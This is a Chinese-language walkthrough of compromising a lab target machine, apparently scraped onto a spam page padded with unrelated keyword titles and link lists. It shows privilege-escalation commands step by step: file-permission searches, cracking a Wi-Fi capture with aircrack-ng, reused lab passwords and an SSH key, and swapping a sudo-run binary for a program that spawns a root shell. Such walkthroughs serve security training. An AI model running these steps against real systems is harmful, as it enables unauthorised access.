当前位置: 首页 > wzjs >正文

小天才电话手表网站wordpress多主题

小天才电话手表网站,wordpress多主题,毕设做网站需要发布到浏览器吗,做饼的网站一、主机发现 arp-scan -l得到靶机ip为192.168.55.155 二、拿到低权限账号 靶机就开放了22端口,去靶机页面一看,给出来了低权限的账号密码 ssh start192.168.55.155成功登陆 三、提权 3.1靶机信息收集 寻找定时任务 crontab -l没找到定时任务 找一…

一、主机发现

arp-scan -l

得到靶机ip为192.168.55.155

二、拿到低权限账号

靶机就开放了22端口,去靶机页面一看,给出来了低权限的账号密码

ssh start@192.168.55.155

成功登陆

三、提权

3.1靶机信息收集

寻找定时任务

crontab -l

没找到定时任务

找一下suid命令

find / -perm  -4000 -print 2>/dev/null

发现该用户不能使用sudo命令

3.2登陆wytshadow用户

寻找可读可写可执行的文件

find / -type f -perm -0777 -print 2>/dev/null

利用scp命令将这两个文件下载到kali本地中

scp start@192.168.55.155:/var/log/.dist-manage/wytshadow.cap .
scp start@192.168.55.155:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt .

其中这个txt文件看着像字典

这个cap文件用wireshark打开

这不是常规的通讯数据包,其中的802.11是无线协议通信

尝试进行爆破

aircrack-ng -w gold star.txt wytshadow.cap

成功爆破出来了密码

尝试登陆wytshadow用户

ssh wytshadow@192.168.55.155
gaUoCe34t1

成功登陆

3.3登陆genphlux用户

发现可以使用nginx命令

启动一下nginx服务试试

sudo service nginx start
systemctl status nginx.service

使用namp扫描一下端口,看看nginx开放的是哪个端口

nmap --min-rate 10000 -p- 192.168.55.155

发现是8080端口开放

使用火狐浏览器访问

发现访问不到

寻找配置文件查看原因

在/etc/nginx/sites-available目录下的default文件找到了答案

需要使用lynx进行查看

注:

lynx:是一个文本模式的网页浏览器

安装lynx

sudo apt-get install lynx

查看网页信息

lynx http://192.168.55.155:8080

又找到了一个账户

genphlux
HF9nd0cR!

使用该账户进行登陆

ssh genphlux@192.168.55.155
HF9nd0cR!

发现该用户可以使用apache2

启动apache2后,发现80端口打开

火狐还是访问不到

试试lynx

也没有访问到信息

继续信息收集了

3.4登陆maleus用户

在该用户目录下找到了ssh私钥

尝试登陆

先将该密钥下载到kali本机中

scp genphlux@192.168.55.155:/home/genphlux/maleus .

登陆maleus用户

chmod 600 maleus
ssh -i maleus maleus@192.168.55.155

继续进行信息收集

在.viminfo中找到了密码信息:B^slc8I$

3.5提权

继续查找sudo命令

此文件就在该用户的目录下

此时我们要做的就是修改该文件的内容,将提权语句插入其中

mv dont_even_bother dont_even_bother.c

然后编辑该文件

int main ()
{system("/bin/bash");
}

编译该文件

gcc -o dont_even_bother dont_even_bother.c

报错了,让我们加入参数

gcc -o dont_even_bother dont_even_bother.c -Wno-implicit-function-declaration
注:
-Wno-implicit-function-declaration 是 GCC 编译器的一个选项,其作用是关闭 “隐式函数声明” 的警告。当你在编译命令里添加这个选项后,编译器在遇到隐式声明的函数时,就不会再发出警告。所以,使用这个命令编译时,之前的警告信息将不会再显示。

然后执行该文件即可

成功提权!


文章转载自:

http://dfcpO8Eh.ypcxs.cn
http://u3RVwg71.ypcxs.cn
http://DRliK1dN.ypcxs.cn
http://ZaU5s6u7.ypcxs.cn
http://4n2b2DK2.ypcxs.cn
http://M1WH1a6H.ypcxs.cn
http://gLPHMspV.ypcxs.cn
http://eRqr51Td.ypcxs.cn
http://ZXv7i86e.ypcxs.cn
http://0QEJ37ap.ypcxs.cn
http://BpP0s1Mg.ypcxs.cn
http://11XwhR6c.ypcxs.cn
http://sMYQCDU9.ypcxs.cn
http://NAk5EfHt.ypcxs.cn
http://fuLwgRXx.ypcxs.cn
http://aHjh5vpM.ypcxs.cn
http://j9LrV2b5.ypcxs.cn
http://xcLoza3u.ypcxs.cn
http://LEZdESFi.ypcxs.cn
http://XFbshiyJ.ypcxs.cn
http://KkfsrxYf.ypcxs.cn
http://jtdoq3Qm.ypcxs.cn
http://bY7verQk.ypcxs.cn
http://BgxcFiyR.ypcxs.cn
http://P0tIynm1.ypcxs.cn
http://nClK65C3.ypcxs.cn
http://Htpv3efY.ypcxs.cn
http://1zyXJoqU.ypcxs.cn
http://uCmxqQtI.ypcxs.cn
http://4buZ9vvc.ypcxs.cn
http://www.dtcms.com/wzjs/719570.html

相关文章:

  • 北京互联网建站网站wordpress关注功能怎么实现
  • 郑州网站改版公司商丘雷光网络科技有限公司
  • 整站策划营销型网站建设网站优化终身免费vps
  • 湖北企业建站系统信息游戏开发物语完美搭配
  • 北京市网站建设企业建网站最少需要多少钱
  • 阿里云做电影网站吗梅州网站设计
  • 如果做微商需不需要开个网站。广州找人做网站
  • 十大网站建设长春网易网站建设
  • 怎么修改网站网页的背景图片asp.net网站支持多国语言
  • 购物网站模板带后台网站开发公司
  • 那个网站做的刀比较好深圳最近一个星期新闻
  • 汽车网站开发网页设计实训
  • 域名查询权威网站广告推广的软件
  • 教学资源库网站建设立项申报书wordpress安装主题
  • 网站建设用哪种语言最好网址ip地址查询
  • 天津建设网站天津市地铁规划图网站建设行业分析报告
  • 深圳网站设计招聘信息u nas 建设网站
  • 知科网站乾安网站建设
  • 内部网站建设公司c 可以做网站吗
  • 网站建设通知广州越秀区核酸检测点查询
  • 杭州萧山区专门做网站的公司企业建设网站的功能是什么意思
  • 云南网站建设首选公司网站开发原始数据
  • 做全屏式网站尺寸是多大网站做专题主题该怎么选
  • 网站内容规划要包括什么内容wordpress 数据库优化
  • jsp 哪些网站品牌高端网站制作企业
  • 凤岗镇网站建设网络推广公司成都
  • 门户网站开发分类东莞路桥投资建设公司招聘
  • 网站建设驻地开发合同阿里巴巴网站域名
  • 成都做网站的工资多少想要导航页面推广app
  • 论坛网站太难做没人微网站免